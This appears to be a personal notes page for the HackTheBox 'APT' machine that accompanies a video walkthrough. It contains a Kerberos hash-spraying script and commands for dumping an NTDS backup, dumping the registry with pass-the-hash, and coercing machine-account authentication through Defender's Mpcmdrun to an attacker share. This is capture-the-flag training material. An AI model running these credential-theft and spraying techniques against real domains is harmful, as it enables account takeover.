xct's notes
Search…
APT
Notes for https://youtu.be/ZnUIiVwNSHk

User

1
python3 IOXIDResolver.py -t apt.htb
2
Address: apt
3
Address: 10.129.124.109
4
Address: dead:beef::8884:1fcc:ce90:638f
Copied!

Secretsdump from backup.zip

1
secretsdump.py -system SYSTEM -security SECURITY -ntds ../Active\ Directory/ntds.dit LOCAL | tee hashes
Copied!

Spray Hashes

Modified from here by InfoSecJack:
1
#!/usr/bin/python3
2
from __future__ import division
3
from __future__ import print_function
4
import sys
5
import argparse
6
import socket
7
from time import sleep
8
import re
9
from impacket.smbconnection import SMBConnection
10
from impacket import smbconnection
11
import multiprocessing
12
import traceback
13
import argparse
14
import sys
15
from binascii import unhexlify
16
from impacket.krb5.kerberosv5 import getKerberosTGT, KerberosError
17
from impacket.krb5 import constants
18
from impacket.krb5.types import Principal
19
import multiprocessing
20
import socket
21
22
def gethost_addrinfo(hostname):
23
try:
24
for res in socket.getaddrinfo(hostname, None, socket.AF_INET6,
25
socket.SOCK_DGRAM, socket.IPPROTO_IP, socket.AI_CANONNAME):
26
af, socktype, proto, canonname, sa = res
27
except socket.gaierror:
28
for res in socket.getaddrinfo(hostname, None, socket.AF_INET,
29
socket.SOCK_DGRAM, socket.IPPROTO_IP, socket.AI_CANONNAME):
30
af, socktype, proto, canonname, sa = res
31
32
return sa[0]
33
34
35
def _login(username, password, domain, lmhash, nthash, aesKey, dc_ip):
36
dc_ip = gethost_addrinfo(dc_ip)
37
try:
38
kerb_principal = Principal(username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
39
getKerberosTGT(kerb_principal, password, domain,
40
unhexlify(lmhash), unhexlify(nthash), aesKey, dc_ip)
41
print('[+] Success %s/%s' % (domain, username) )
42
return True
43
except KerberosError as e:
44
return False
45
if (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_C_PRINCIPAL_UNKNOWN.value) or (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_CLIENT_REVOKED.value) or (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_WRONG_REALM.value):
46
print("[-]Could not find username: %s/%s" % (domain, username) )
47
elif e.getErrorCode() == constants.ErrorCodes.KDC_ERR_PREAUTH_FAILED.value:
48
return
49
else:
50
print(e)
51
except socket.error as e:
52
print('[-]Could not connect to DC')
53
return
54
55
DOMAIN = 'htb.local'
56
USERNAME = 'henry.vinson'
57
def login(username, hash):
58
return _login(username, '', DOMAIN, '', hash, None, "apt6.htb")
59
60
passwords = [x.strip() for x in open("hashes.txt").readlines()]
61
SLEEP_TIME = 5
62
63
for x in passwords:
64
if login(USERNAME, x):
65
print(f"[+] Success {x}")
66
exit()
Copied!

Dump Remote Registry

1
reg.py htb.local/[email protected] -hashes :*** query -keyName HKU -s | tee hku.reg
Copied!

Root

Authenticate with Machine Account to our box

1
C:\progra~1\Window~1\Mpcmdrun.exe -Scan -ScanType 3 -File '\\***\xct\xct'
Copied!

Secretsdump with Machine Account

1
secretsdump.py htb.local/'APT#x27;@apt6.htb -hashes :***
Copied!
Last modified 5mo ago